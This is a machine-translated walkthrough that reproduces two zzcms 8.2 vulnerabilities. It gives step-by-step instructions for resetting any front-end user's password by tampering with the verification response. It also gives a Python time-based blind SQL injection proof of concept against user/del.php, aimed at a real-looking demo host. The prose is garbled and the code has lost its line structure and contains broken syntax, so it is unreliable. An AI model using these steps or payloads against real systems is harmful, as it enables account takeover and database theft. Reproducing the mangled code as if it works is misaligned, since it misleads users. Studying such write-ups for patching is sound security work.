zzcms8.2# any user password reset #del.php time Blind # recurrence

00x0 Introduction

Morning woke up and found Seebug updated a batch of new holes,

Found zzcms8.2 this hole a lot of people are digging, so I silently embarked on the road of recurrence (if you want to buy the details, I why so toss ~)

Environment: zzcms8.2 (product investment type)

php-5.4.45

. mysql-5.5.53

01x0 any user password reset 01x1 any user password reset mode one

In other words, the title of this hole should be any front-end user password reset, the background administrator can not reset, perhaps I reproduce the problem.

Register an account first and then the home page to find your password.

Address: http://localhost/one/getpassword.php

　　　　

There is also a user traversal here, and if the user exists, then the correct status is returned on the front page as described above

　　　　　　

　　　　　　　

Back to the topic, enter the verification code and click Next to go to the next state.

　　　　　　

　　　　　　　　　

Do not click to get verification code, arbitrary input any number, directly click Next, grab the bag

Get Response Package

　　

Change No to Yes, then forward, and here you'll find the front page doesn't change.

Then look at the grab Bag tool and you'll see this bag

　　

This is obviously the verification code successful package, direct forward.

Enter the new password and reset it directly.

Reset succeeded

01x2 any user password reset mode two

This, is the simplest, do not have to grab the bag at all.

Take the demo station to do the test.

　　

Next

Will see, this, and then do not have to choose the authentication method, do not click to obtain the verification code, casually enter any number, directly click Next.

Be sure to enter it quickly, or it will be validated by the backend

Such a red warning character before clicking Next

Jump directly to the change password,

02x0 del.php Time Blind

This one was sent by a master in Freebuf, I'm doing a simple analysis.

Http://www.freebuf.com/vuls/161888.html

user/del.php 13 Lines

Here are two post parameters are not processed, passed in directly after the format of the.

136 more lines.

directly into the query. Put the POC on Daniel.

#!/usr/bin/env python#-*-coding:utf-8-*-import requestsimport timepayloads = ' [email protected]_. '    #匹配用的字符串url = "http://demo.zzcms.net/user/del.php"user = ' For I in range (1, 2): For        payload in payloads:
       
         #遍历取出字符                StartTime =
         time.time () post_data = "id=1&tablename=zzcms_answer where id = 1 and if ((ASCII ( substr (User (), +)) = "+ str (ORD (payload)) +"), sleep (5), 1)%23 ". Encode (" Utf-8 ") response = requests.post (URL, Timeout=6, Data=post_data, headers={"Content-type": "Application/x-www-form-urlencoded"}) if Time.time ()- StartTime > 5: User = payloadprint ' user is: ', Userbreakprint ' \n[done] Current user is%s '% user 
       

zzcms8.2# any user password reset #del.php time Blind # recurrence